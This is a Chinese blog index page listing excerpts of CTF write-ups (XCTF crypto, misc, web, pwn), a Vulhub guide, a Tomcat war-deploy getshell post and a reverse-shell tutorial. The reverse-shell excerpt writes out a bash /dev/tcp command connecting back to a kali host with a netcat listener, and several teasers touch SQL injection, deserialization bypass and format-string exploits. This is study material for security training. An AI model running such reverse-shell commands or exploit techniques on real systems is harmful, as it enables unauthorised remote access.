自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Sea_Sand息禅

我爱大风和烈酒,也爱孤独和自由。

  • 博客(36)
  • 收藏
  • 关注

原创 攻防世界-Crypto-Easy-one(main函数传参、加密代码审计)-Hack-you-2014

下载文件解压得:加密代码:#include <stdlib.h>#include <stdio.h>#include <string.h>int main(int argc, char **argv) { if (argc != 3) { printf("USAGE: %s INPUT OUTPUT\n", argv[0]); ...

2019-04-26 19:53:27 2647

原创 攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)-XCTF 4th-QCTF-2018

扫描目录,发现.git泄露:提取.git泄露的源码,得到许多文件:网站这里:应该是买到手之后就能拿到flag,如果是这个flag就在.git里,那就好办了,尝试配合grep命令在这些文件中查找flag,并没有结果,要想有钱买flag,首页就给我们提供了一个方法:买彩票猜数就行了,但是怎么能猜对?这就要审计一下代码,找找漏洞了。经过一番审计,猜数字对应的函数在api.ph...

2019-04-26 12:45:17 4552 4

原创 攻防世界-Misc-hit-the-core(strings使用、密码规律观察)

strings查看字符串,好像还真得到一个有用的串:这个串挺长的,{}的位置正确,凯撒、栅栏就别想了,能不能从串本身找到规律?仔细观察,发现前面部分的大写字母拼起来正好是ALEXCTF,而且每个字母之间隔了4个字母,写个脚本提取一下:data = 'cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_r...

2019-04-26 10:41:56 3678

原创 攻防世界-Misc-embarrass(strings使用)-ciscn-2017

这个题特别简单,简单到不想写writeup,但是为什么要写一篇,算是一次提醒吧,提醒自己考虑问题要全面,做题要认真,要勤于思考,不要总是在一些没必要的地方浪费时间,要不厌其烦的去尝试。拿到包之后直接wireshark打开了,想着流量分析、导出图片、导出文本(思路太模式化),然后就拿着分析了一阵子,相信大家都知道流量分析有时候确实要花费不少时间,各种协议筛选,当真是傻X。分析了一段时间,没有...

2019-04-26 10:14:15 4474

原创 功防世界-Misc-隐藏在黑夜里的秘密(不像是压缩包的压缩包-linux无视密码直接提取)

下载文件,是个压缩包,需要密码才能解压。伪加密检测了一下,并不是伪加密,然后binwalk也确实只是zip文件:拿去暴力破解,竟然报错了:这就奇怪了,不就是个zip压缩包吗,winhex看了也没什么异常啊,怎么办。。。尝试着在linux上打开,也发生错误,打不开这个包:应该是这个包本身编码出错了,但是惊奇地发现,在linux上可以把文件提取出来:图片拿到stegso...

2019-04-25 22:44:23 1130

原创 攻防世界-Misc-Get-the-key.txt(linux文件系统挂载、grep、gunzip )

拿到文件,解压得到一个未知的文件,拿到Linux中file查看:是Linux的文件系统数据,本来只要挂载就行了,但是我又用strings查看了一下字符串,然后差点完蛋。。。strings查看结果: 看到这么多像是flag的字符串,还有这么多的文件名,果断用了binwalk,谁知道检测到了一大堆gzip文件:然后就分解了一下QAQ:然后看了看文件,发...

2019-04-25 21:48:04 3045 1

原创 攻防世界-Crypto-告诉你个秘密(键盘密码)-ISCC2017

下载文件,得内容如下:636A56355279427363446C4A49454A7154534230526D684356445A31614342354E326C4B4946467A576942696145306716进制转换成字符串:cjV5RyBscDlJIEJqTSB0RmhCVDZ1aCB5N2lKIFFzWiBiaE0gbase64解码:r5yG lp9I BjM tF...

2019-04-24 18:49:14 6024

原创 攻防世界-Misc-glance-50(convert分离gif、montage图片拼接)-mma-ctf-2nd-2016

拿到一个gif图片,很窄(宽2px),无语。我们可以先把gif分解开,kali的convert命令可以,也可以用其他的工具:convert glance.gif flag.png总共分离出来200个图片。这么窄的图,难道要横着拼起来?于是又用到一个工具:montage,这个工具用法很多,也很强大用命令:montage flag*.png -tile x1 -geometr...

2019-04-24 12:57:13 9797 7

原创 攻防世界-web-ics-06--XCTF 4th-CyberEarth

进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag

2019-04-23 21:24:06 6327 2

原创 攻防世界-Misc萌新-5-1(xortool使用)-WDCTF-2017

拿到文件,照惯例winhex查看,未知类型文件,xortool尝试:尝试出了key:GoodLuckToYou,对原文件进行异或,脚本如下:key = 'GoodLuckToYou'flag = ''with open('cipher') as f: con = f.read() for i in range(len(con)): flag +=...

2019-04-22 18:26:54 6212 8

原创 Vulhub漏洞环境使用教程

Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。1、vulhub下载下载地址:https://github.com/vulhub/vulhub2、docker安装apt-get install docker.io安装后注意使用时启动docke:serv...

2019-04-21 11:34:33 13501

原创 攻防世界-Crypto萌新-sleeping-guard(base64解码+文件头异或)-csaw-ctf-2016-quals

打开网页一堆base64码,解码是乱码,也不能转成图片,去查了wp,好像题有问题,少给了一段代码,虽然给了我也做不出来import base64from twisted.internet import reactor, protocolimport os PORT = 9013 import structdef get_bytes_from_file(filename): ...

2019-04-17 22:06:43 1943

原创 攻防世界-Crypto萌新-Easy_Crypto(异或加密)-2017高校网络信息安全运维挑战赛

压缩包里一个密文,一个加密算法:get buf unsign s[256]get buf t[256]we have key:hello worldwe have flag:????????????????????????????????for i:0 to 256 set s[i]:ifor i:0 to 256 set t[i]:key[(i)...

2019-04-17 19:39:16 3199

原创 python read()读取文件报错'gbk' codec can't decode byte 0x86

有一个这样的文件:window的ANSI编码,看着乱码,读取代码:f = open('enc.txt','r')c = f.read()报错:'gbk' codec can't decode byte 0x86 in position 2: illegal multibyte sequence由于python用的是utf-8,所以这里要做一个编码转换:f =...

2019-04-17 19:35:47 21039 1

原创 serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界-web萌新-unserialize3

知识点:1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。3、魔术方法:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除...

2019-04-17 18:06:22 3455 1

原创 攻防世界-Misc萌新-MISCall(.git目录利用、git stash命令)-noconname-2014-quals

拿到文件,winhex无线索,binwalk检测是bzip2文件,tar zjvf ctf进行解压:看来我们拿到了某个站的git目录了 ,解压目录有个flag.txt文件,但flag并不在这里,以“.”开头的文件会被Linux自动隐藏,查看隐藏文件看到.git目录,大致浏览了下,接着对.git目录进行操作(在.git目录外操作):先简单说下git stashgit stash 的作用...

2019-04-16 14:07:09 2598 2

原创 攻防世界-Crypto萌新-传感器1(曼切斯特编码和差分曼切斯特编码)-ciscn-2017

题目:已知ID为0x8893CA58的温度传感器的未解码报文为:3EAAAAA56A69AA55A95995A569AA95565556 此时有另一个相同型号的传感器,其未解码报文为:3EAAAAA56A69AA556A965A5999596AA95656 请解出其ID,提交flag{hex(不含0x)}。第一次碰到曼切斯特编码和差分曼切斯特编码,做的时候毫无头绪,编码原理参考:ht...

2019-04-16 13:19:48 4165 5

原创 攻防世界-web萌新-FlatScience(python处理pdf、sqlite注入)-Hack.lu-2017

日常扫描:进站后点击链接尝试会让下载pdf文件。(后面要用到pdf文件)访问robots.txt:再依次对这两个页面进行测试:admin.php无论如何输入都没有什么反馈login.php在username中输入admin' union select database()时报错:可以看到是sqlite数据库,表的结构和查询函数和MySQL有所不同。在这里花了相当长的时间...

2019-04-15 23:37:38 5835 3

原创 攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)

打开网页,日常扫描,发现git泄露:git工具下载相关文件(git工具自行百度):然而flag.php的内容是这样的没什么用,想着也不会这么简单:网页源码有这一段:说明flag应该就在flag.php中,再看看index.php,主要是这一部分:<?phpif (isset($_GET['page'])) { $page = $_GET['page'];...

2019-04-15 19:06:09 4461

原创 攻防世界-Crypto-说我作弊需要证据(RSA解密+校验py脚本)-ISCC2017

1、说我作弊需要证据给了一个数据包,打开追踪流发现信息,大量的base64码:解码几行得到:SEQ = 13; DATA = 0x3b04b26a0adada2f67326bb0c5d6L; SIG = 0x2e5ab24f9dc21df406a87de0b3b4L;SEQ = 0; DATA = 0x7492f4ec9001202dcb569df468b4L; SIG = 0x...

2019-04-15 17:39:11 4491 9

原创 功防世界-Misc(部分)

1、Cephalopod数据包打开,分组字节流查询个flag,发现出现了flag.png的字样,但是并没有这个图片文件,往下翻,图片应该在长度较大的流中,追踪tcp流在tcp.stream eq 2处找到图片文件:把图片提取出来拿到flag:2、Test-flag-please-ignore文件内容拿去16进制解码得flag。3、János-the-Ripper解压出来...

2019-04-15 15:25:10 3193 1

转载 用实例给新手讲解RSA加密算法

图为 RSA公开密钥算法的发明人,从左到右Ron Rivest, Adi Shamir, Leonard Adleman. 照片摄于1978年   RSA加密算法是最常用的非对称加密算法,CFCA在证书服务中离不了它。但是有不少新来的同事对它不太了解,恰好看到一本书中作者用实例对它进行了简化而生动的描述,使得高深的数学理论能够被容易地理解。我们经过整理和改写特别推荐给大家阅读,希望能够对时间...

2019-04-15 10:59:38 1150

原创 base64原理+base64隐写

借鉴一位大佬的博客,说一下base64原理及base64隐写的原理:转载自大佬博客:https://www.tr0y.wang/2017/06/14/Base64steg/BASE64 是一种编码方式, 是一种可逆的编码方式.编码后的数据是一个字符串, 包含的字符为: A-Za-z0-9+/共 64 个字符:26 + 26 + 10 + 1 + 1 = 64其实是 65 个字符, ...

2019-04-14 16:56:58 7623 6

原创 攻防世界-Misc-新手练习记录

ext3下载文件,文件名是Linux,拿到kali中看下文件类型:ext3就是Linux的一个文件系统,strings查看一下有没有flag这样的字符串:flag应该就在这个flag.txt中了,把这个文件系统挂载到Linux上:mount linux /mnt挂上去之后看一下/mnt/下的文件,用命令ls -al /mnt/,可以看到上面strings查找到的O7...

2019-04-13 19:01:57 16110 5

原创 RSA公钥/私钥解密文件

RSA的原理介绍参考:https://blog.csdn.net/zz_Caleb/article/details/89307932两个文件,一个经过RAS加密了的文件,一个公钥文件:RSA是一种非对称加密,公钥加密的文件是需要私钥来解的,首先提取私钥(第一个命令):openssl rsa -pubin -text -modulus -in warmup -in pubkey....

2019-04-13 17:25:38 2089

原创 攻防世界-Web-萌新入坑-NaNNaNNaNNaN-Batman(html乱码脚本处理)

NaNNaNNaNNaN-Batman下载文件,内容是这样的:脚本语言,是html文件,修改后缀用浏览器打开得到:是一个输入框,看来我们要先弄清楚这个文件的代码才行,审计代码可以看到最开始的下划线“_”是一个变量,其内容是一个函数的代码,而最后又是一个eval(_),也就是执行这个函数了,我们把eval改为alert,让程序弹框,得到了源码的非乱码形式:把得到的代码整理一下就是...

2019-04-13 15:33:47 10502 4

原创 tomcat系统登录部署漏洞—msf破解及war包部署getshell

跟着大佬学习的,如有问题,欢迎指教。tomcat是一个很常见的java web application服务器此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解0x00:环境部署1、java环境,以便运行xmapp2、xmapp下载:https://www.apachefriends.org/index.html3、运行xmapp的tomc...

2019-04-11 13:30:40 1902

原创 功防世界-reverse-新手练习(更新中)

1、re1ida反编译看到:所以flag就在程序中隐藏着,用strings工具进行关键字查找,找到flag:strings工具下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/strings2、game手动通关:1 2 3 4 5 6 7 8 | 8 7 6 5 4 3 2 1ida中查找字符串:...

2019-04-10 13:38:15 1163

原创 bugku-杂项-妹子的陌陌(黑白反色、AES解密)

下载文件,foremost分解出一个压缩包,但是解压需要密码,图片上写到:喜欢我吗.这就是密码(不要忘了最后的点),解压后得到txt文件:嘟嘟嘟嘟士兵:报告首长!已截获纳粹的加密电报!首长:拿来看看电报内容:..../-/-/.--./---.../-..-./-..-././-./-.-./---/-.././.-.-.-/-.-./..../.-/..../..-/--...

2019-04-07 16:46:47 864

原创 bugku-Web-login2(SKCTF)(union注入绕过密码、反弹shell)

hint:union,命令执行我们的第一步就是要利用union注入进行登录了,bp抓个包看看:相应头这里还是给了我们一个tip的,base64解码得到:$sql="SELECT username,password FROM admin WHERE username='".$username."'";if (!empty($row) && $row['passwor...

2019-04-06 13:56:05 3024 3

原创 反弹shell方法

1、bash反弹shellkali ip:192.168.10.130目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1kali机执行命令:nc -lvp 8888bash -i:在本地打开一个bash终端linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:0...

2019-04-06 13:41:08 813

原创 bugku-Web-login3(SKCTF)(登录用户名+异或方式的bool盲注)

题目给出了提示:基于布尔的SQL盲注打开网页,是登录框,那我们很大可能就是在username或password上进行注入,可能性大一点的是username了吧。首先输进行一些尝试,找出正确的注入地方以及是否进行了过滤。反馈是password error!输入用户名admin1,得到username does not exist!,所以这里应该是先对username进行查询,这...

2019-04-05 23:28:10 1078 1

原创 功防世界-pwn-新手练习(更新中)

1、CGfsb:https://blog.csdn.net/zz_Caleb/article/details/889808662、when_did_you_born(简单的ROP)下载文件,是一个64位的elf文件,放到ida中看伪码,报错:搜了一下这个问题,是栈的问题,可以通过修改一些设置来解决,但是,找到了main函数:在这个地方查看伪码不会报错,而且主函数的源码可以得到:...

2019-04-02 22:22:23 948

原创 格式化字符串漏洞原理及简单利用(CGfsb题解)

先介绍一下格式化字符串漏洞,这种漏洞在实际中应该很少有了,但仍然需要了解这些基础的漏洞知识。会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数,该题就是利用了printf的漏洞,下面以printf为例进行介绍。printf函数的使用方法为:printf("format",输出表列),由于format部分可以有许多的占位符及字母,所以接受的参...

2019-04-02 21:22:20 5386

原创 CGCTF-Crypto记录

异性相吸下载文件,解压的明文和密文,tip也有xor,这就是用异或解密的,把两个文件的内容进行异或得到结果。下面是异或脚本:f1 = open('明文.txt', 'r')f2 = open('密文.txt', 'r')c1 = f1.read()c2 = f2.read()r = ''for i in range(len(c1)): r += chr(ord(c...

2019-04-01 16:05:46 653

原创 bugku-Web-Trim的日记本

hints:不要一次就放弃还是尽快放弃的好。。。。。我登录的注入很弱耶,御剑扫描一下,得到一个http://123.206.87.240:9002/show.php。访问此网页,flag就有了,为什么是200分。。。...

2019-04-01 15:43:26 491

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除